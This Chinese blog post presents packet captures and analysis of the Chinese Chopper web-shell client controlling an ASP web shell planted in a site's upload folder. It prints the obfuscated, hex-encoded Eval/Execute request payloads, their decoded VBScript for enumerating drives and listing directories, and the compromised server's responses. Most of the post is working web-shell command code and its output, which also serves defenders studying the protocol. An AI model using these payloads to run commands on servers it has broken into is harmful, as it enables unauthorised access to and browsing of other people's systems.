菜刀 ASP链接SHELL 抓包结果及分析

http://blog.csdn.net/webxscan     神龙


&chr(9)      TAB  \t

&chr(58)     :
:       换行

WebRoot   获取  SHELL信息
#获取路径
x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A4966204572722054

68656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652

85329"""")):Response.Write(""""|<-""""):Response.End"")")

Dim S:S=Server.Mappath(".")&chr(9)
SET C=CreateObject("Scripting.FileSystemObject")
If Err Then
Err.Clear
Else
For Each D in C.Drives
S=S&D.DriveLetter&chr(58)
Next
End If
Response.Write(S)

->|d:\virtualhost\host7377245\www\upload\newsimage\shell.asp    C:D:E:R:|<-


##################################
FileManage   通过目录获取文件列表信息
获取目录
x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""
44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D20464426223

0223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D617444

61746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A5345542

0433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E7365

2E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E5772697465204

62E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E6174747269627574

657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F64696669656429266368722

83929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966
"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=643A5C5C7669727475616C686F73745C5C686F7374373337373234355C5C7777775C5C75706C6F61645C5C6E657773696D6167655C5C7368656C6C2E6173705C5C

Dim RR:RR=bd(Request("z1"))
Function FD(dt)
FD=Year(dt)&"-"
If Len(Month(dt))=1 Then
FD = FD&"0"
End If
FD=FD&Month(dt)&"-"
If Len(Day(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"
If Len(Second(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Second(dt)
End Function
SET C=CreateObject("Scripting.FileSystemObject")
Set FO=C.GetFolder(""&RR&"")
If Err Then
Response.Write("ERROR:// "&Err.Description)
Err.Clear
Else
For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)
Next
For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)
Next
End If

Dim RR:RR=bd(Request("z1"))Function FD(dt)FD=Year(dt)&"-"If Len(Month(dt))=1 ThenFD = FD&&chr(48)End IfFD=FD&Month(dt)&"-"If Len(Day(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"If Len(Second(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Second(dt)End FunctionSET C=CreateObject("Scripting.FileSystemObject")Set FO=C.GetFolder(""&RR&"")If Err ThenResponse.Write("ERROR: "&Err.Description)Err.ClearElseFor Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)NextFor Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)NextEnd If


->|z/    2016-01-06 14:02:59    0    16
20151125161429379.jpg    2015-11-25 16:14:29    27    1
20151125161501308.jpg    2015-11-25 16:15:01    27    1
20151126152910502.jpg    2015-11-26

15:29:10    27    1
20151127140949237.jpg    2015-11-27 14:09:49    27    1
20151127141016802.jpg    2015-11-27 14:10:16    27    1
20151128121918619.jpg    2015-11-28 12:19:18    27    

1
20151128122050259.jpg    2015-11-28 12:20:50    27    1
20151129134832033.jpg    2015-11-29 13:48:33    27    1
20151129134914657.jpg    2015-11-29 13:49:14    27    1
20151130131448878.jpg    2015-11-30 13:14:48    27    1
20151130131502483.jpg    2015-11-30 13:15:02    27    1
20151201201439010.jpg    2015-12-01 20:14:39    27    1
20151201201635647.jpg    2015-12-01 20:16:35    27    1
20151202155709826.jpg    2015-12-02 15:57:09    27    1
20151202155810417.jpg    2015-12-02 15:58:10    27    1
20151203161010273.jpg    2015-12-03 16:10:10    27    1
20151203161106179.jpg    2015-12-03 16:11:06    27    

Receive: Return Code: 0x00000000
1
20151204143314886.jpg    2015-12-04 14:33:14    27    1
20151206134439872.jpg    2015-12-06 13:44:39    27    1
20151206134534952.jpg    2015-12-06 13:45:34    27    1
20151207122215148.jpg    2015-12-07 12:22:15    27    1
201512

Receive: Return Code: 0x00000000
07122330608.jpg    2015-12-07 12:23:30    27    1
20151208130657123.jpg    2015-12-08 13:06:57    27    1
20151208130759351.jpg    2015-12-08 13:07:59    27    1
20151209143924394.jpg    2015

-12-09 14:39:24    27    1
20151209144048891.jpg    2015-12-09 14:40:48    27    1
20151210140328146.jpg    2015-12-10 14:03:28    27    1
20151210140553956.jpg    2015-12-10 14:05:53    27    

1
20151211131426653.jpg    2015-12-11 13:14:26    27    1
20151212141046434.jpg    2015-12-12 14:10:46    27    1
20151212141301143.jpg    2015-12-12 14:13:01    27    1
20151213125012208.jpg    2015-12-13 12:50:12    27    1
2



你可能感兴趣的:(菜刀 ASP链接SHELL 抓包结果及分析)